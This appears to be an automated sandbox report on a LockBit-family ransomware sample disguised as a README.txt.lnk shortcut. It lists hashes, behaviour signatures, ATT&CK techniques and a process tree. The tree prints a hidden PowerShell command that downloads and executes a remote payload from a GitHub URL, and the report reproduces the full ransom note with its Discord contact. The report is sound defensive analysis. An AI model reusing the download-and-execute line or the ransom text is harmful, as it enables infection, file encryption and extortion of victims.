lockbit | 3b497ec4d80770a5172a72f871528397fde8ea5969aa2c3cde98edb0a6946355

Resubmissions

26-01-2025 14:47

250126-r5ypsstrbv 10

19-01-2025 12:07

250119-palewaxlbp 10

Analysis

max time kernel
78s
max time network
79s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 12:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

README.txt.lnk
Size

1KB
MD5

e1cff745a65a199bdf9dfebe3f69e3f7
SHA1

8c77e01ceb0ff774a66afa5b7a32b0735e422e9e
SHA256

3b497ec4d80770a5172a72f871528397fde8ea5969aa2c3cde98edb0a6946355
SHA512

7e9204f24290dfdff14200945a31b7d3421122f3fb526845a8250e4325751af5fac226057becf1d0d381f021cca6aae7f6fe0b2d2b517c3441006423de03496c

Score

10^/10

lockbit defense_evasion discovery ransomware spyware stealer

Malware Config

Extracted

Path

C:\xP8S4N9J1.README.txt

Ransom Note

======================================== !!! ATTENTION !!! Your Files Have Been Encrypted by ManiaCrypt ======================================== What Happened? -------------- All of your important files, documents, photos, and databases have been encrypted using RSA. Without our decryption program, your files cannot be restored. Why Trust Us: -------------------- If we dont give you the decryption program after payment, nobody will trust us. What You Need to Do: -------------------- To get the decryption program, you must contact us. Steps to Restore Your Files: ---------------------------- 1. Open Discord and add the username ballets4. 2. Send us a message and mention your situation. 3. We will provide further instructions for obtaining the decryption program. Important Information: ----------------------- - DO NOT attempt to recover your files using third-party tools. They may damage your data and make recovery impossible. - DO NOT rename, move, or modify the encrypted files. This will also make decryption impossible. - Only we have the tools required to decrypt your files safely and effectively. We are waiting for your message. Time is critical. ======================================== Your Files. Your Responsibility. ========================================

Signatures

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Lockbit family
lockbit

Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000b000000023ba9-18.dat	family_lockbit

Renames multiple (639) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	1224	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	E725.tmp

Executes dropped EXE 2 IoCs

pid	Process
3872	91qsdf.exe
2276	E725.tmp

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3350944739-639801879-157714471-1000\desktop.ini	91qsdf.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3350944739-639801879-157714471-1000\desktop.ini	91qsdf.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\spool\PRINTERS\00002.SPL	splwow64.exe
File created	C:\Windows\system32\spool\PRINTERS\PP8iae15jg5puum02x009ip1f_.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PPr8va68zpzgs5qda3s_0uu5v0b.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PPjxgvch6g9rb16wxwxssia1mib.TMP	printfilterpipelinesvc.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\xP8S4N9J1.bmp"	91qsdf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\xP8S4N9J1.bmp"	91qsdf.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2276	E725.tmp

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	91qsdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	E725.tmp

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ONENOTE.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	ONENOTE.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	ONENOTE.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	ONENOTE.EXE

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop	91qsdf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\WallpaperStyle = "10"	91qsdf.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
4484	NOTEPAD.EXE
5768	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4864	ONENOTE.EXE
4864	ONENOTE.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1224	powershell.exe
1224	powershell.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe
3872	91qsdf.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeDebugPrivilege	3872	91qsdf.exe
Token: 36	3872	91qsdf.exe
Token: SeImpersonatePrivilege	3872	91qsdf.exe
Token: SeIncBasePriorityPrivilege	3872	91qsdf.exe
Token: SeIncreaseQuotaPrivilege	3872	91qsdf.exe
Token: 33	3872	91qsdf.exe
Token: SeManageVolumePrivilege	3872	91qsdf.exe
Token: SeProfSingleProcessPrivilege	3872	91qsdf.exe
Token: SeRestorePrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSystemProfilePrivilege	3872	91qsdf.exe
Token: SeTakeOwnershipPrivilege	3872	91qsdf.exe
Token: SeShutdownPrivilege	3872	91qsdf.exe
Token: SeDebugPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeBackupPrivilege	3872	91qsdf.exe
Token: SeSecurityPrivilege	3872	91qsdf.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
4864	ONENOTE.EXE
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe
5584	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4580 wrote to memory of 1568	4580	cmd.exe	84
PID 4580 wrote to memory of 1568	4580	cmd.exe	84
PID 1568 wrote to memory of 2020	1568	cmd.exe	85
PID 1568 wrote to memory of 2020	1568	cmd.exe	85
PID 1568 wrote to memory of 1224	1568	cmd.exe	86
PID 1568 wrote to memory of 1224	1568	cmd.exe	86
PID 1224 wrote to memory of 3872	1224	powershell.exe	87
PID 1224 wrote to memory of 3872	1224	powershell.exe	87
PID 1224 wrote to memory of 3872	1224	powershell.exe	87
PID 3872 wrote to memory of 4756	3872	91qsdf.exe	93
PID 3872 wrote to memory of 4756	3872	91qsdf.exe	93
PID 2684 wrote to memory of 4864	2684	printfilterpipelinesvc.exe	105
PID 2684 wrote to memory of 4864	2684	printfilterpipelinesvc.exe	105
PID 3872 wrote to memory of 2276	3872	91qsdf.exe	107
PID 3872 wrote to memory of 2276	3872	91qsdf.exe	107
PID 3872 wrote to memory of 2276	3872	91qsdf.exe	107
PID 3872 wrote to memory of 2276	3872	91qsdf.exe	107
PID 2276 wrote to memory of 2608	2276	E725.tmp	108
PID 2276 wrote to memory of 2608	2276	E725.tmp	108
PID 2276 wrote to memory of 2608	2276	E725.tmp	108
PID 5584 wrote to memory of 5768	5584	OpenWith.exe	121
PID 5584 wrote to memory of 5768	5584	OpenWith.exe	121
PID 5808 wrote to memory of 5908	5808	chrome.exe	125
PID 5808 wrote to memory of 5908	5808	chrome.exe	125
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 2292	5808	chrome.exe	126
PID 5808 wrote to memory of 3616	5808	chrome.exe	127
PID 5808 wrote to memory of 3616	5808	chrome.exe	127
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128
PID 5808 wrote to memory of 4888	5808	chrome.exe	128

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\README.txt.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4580
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:2020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Users\Admin\91qsdf.exe
      "C:\Users\Admin\91qsdf.exe"
      4⤵
      Executes dropped EXE
      Drops desktop.ini file(s)
      Sets desktop wallpaper using registry
      System Location Discovery: System Language Discovery
      Modifies Control Panel
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3872
    - - C:\Windows\splwow64.exe
        
        C:\Windows\splwow64.exe 12288
        5⤵
        Drops file in System32 directory
        
        PID:4756
    - - C:\ProgramData\E725.tmp
        
        "C:\ProgramData\E725.tmp"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2276
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\E725.tmp >> NUL
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:3684

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\xP8S4N9J1.README.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4484

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
  /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{9ECA4A47-026E-44FE-BD2A-2080ED1F37EA}.xps" 133817620747520000
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:4864

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5584
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ProtectSplit.docx.xP8S4N9J1
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff83abecc40,0x7ff83abecc4c,0x7ff83abecc58
  2⤵
  PID:5908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,15741634675423215798,12642020001100228433,262144 --variations-seed-version --mojo-platform-channel-handle=1772 /prefetch:2
  2⤵
  PID:2292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,15741634675423215798,12642020001100228433,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  PID:3616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,15741634675423215798,12642020001100228433,262144 --variations-seed-version --mojo-platform-channel-handle=2436 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,15741634675423215798,12642020001100228433,262144 --variations-seed-version --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:1280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,15741634675423215798,12642020001100228433,262144 --variations-seed-version --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,15741634675423215798,12642020001100228433,262144 --variations-seed-version --mojo-platform-channel-handle=4520 /prefetch:1
  2⤵
  PID:2032

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:5560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3350944739-639801879-157714471-1000\desktop.ini

Filesize
129B

MD5
75353c839e0c6d46cfd1468d774c78db

SHA1
fc0af79b84a67113253e84cc26ac32d33ac9465e

SHA256
39410e75c4ba6287049319ef01b2d371f0134463a936b85a5fcbd6171e704b98

SHA512
2403537a97ea63d3611069adf5a5fba7f239cfc8be5ebaf6b8a49933f6a55bd88b8721993e3e659b1a16c5f23c9a830bfa679bfb67844c3bb6ae85821f638199

Download Submit
C:\ProgramData\E725.tmp

Filesize
14KB

MD5
294e9f64cb1642dd89229fff0592856b

SHA1
97b148c27f3da29ba7b18d6aee8a0db9102f47c9

SHA256
917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

SHA512
b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

Download Submit
C:\Users\Admin\91qsdf.exe

Filesize
147KB

MD5
3c2c0b97e9295c60267c533010ad9253

SHA1
270ddd75d7880a91c0a0cafaffed4f2757f54770

SHA256
984d394fb9324130b52cc05e04db17fd6e1743652e3500e8fbc0b28cc06f125c

SHA512
c6fed2954e05a33d5ef99610b937450043fc61fa0537f9da982e2c0dcac1ee26f734609ed207b12ad8dda31d191af2072c76b9f19ffbaa4a56b09b47a5955914

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
0c764076db8930dae70115c2eae436a4

SHA1
630fa83893d113f80e9b3df9343ce45f38595556

SHA256
0f9b057ef82750dc86a520e4b7070ba9503ce9d97dbab71f7f4d802e284232a0

SHA512
bfb705ba8396e504fcee6cd7a1b947600ecc20f646109b37e6d1e8dd0d3dd3343bd70bfefde45bd8fc52edfdca1a4d5151e7d51cc476e3f818545d8fd8783950

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

Filesize
192KB

MD5
a8cf54419129b874864cf206392ece0f

SHA1
2d8f78e5d6951faedba3257d5794227f34c50967

SHA256
b8a7649c907c010db609d7143f3f0601a385b9cf803f4b0bddb449c41151cc1f

SHA512
02a77857be5123636fdc44791f6cf7a4532fa53e34576be7f6ab21da51ef400fc138d7dda6a2880b2b42ddb22a803a1897e4f95ea3479487af61a199c7929a8c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
a137c047dc8343f7c67792057f2e1d46

SHA1
163ca135fe3ffaaf504c10e40c2fcc1d26718504

SHA256
cb59412cb8ded95fb1bccd9f9ede2ee2fa2eb5d13f2b1d4b0cfd183c281b07d6

SHA512
6a2bcd80f897212fa06cab6b658c7eebe3345c5e92a3386d5209f71550c36b8547541514795a61e00e11eaee6ab0bc1d8bf6cbf19d2d277a7e8185b58bfddab7

Download Submit
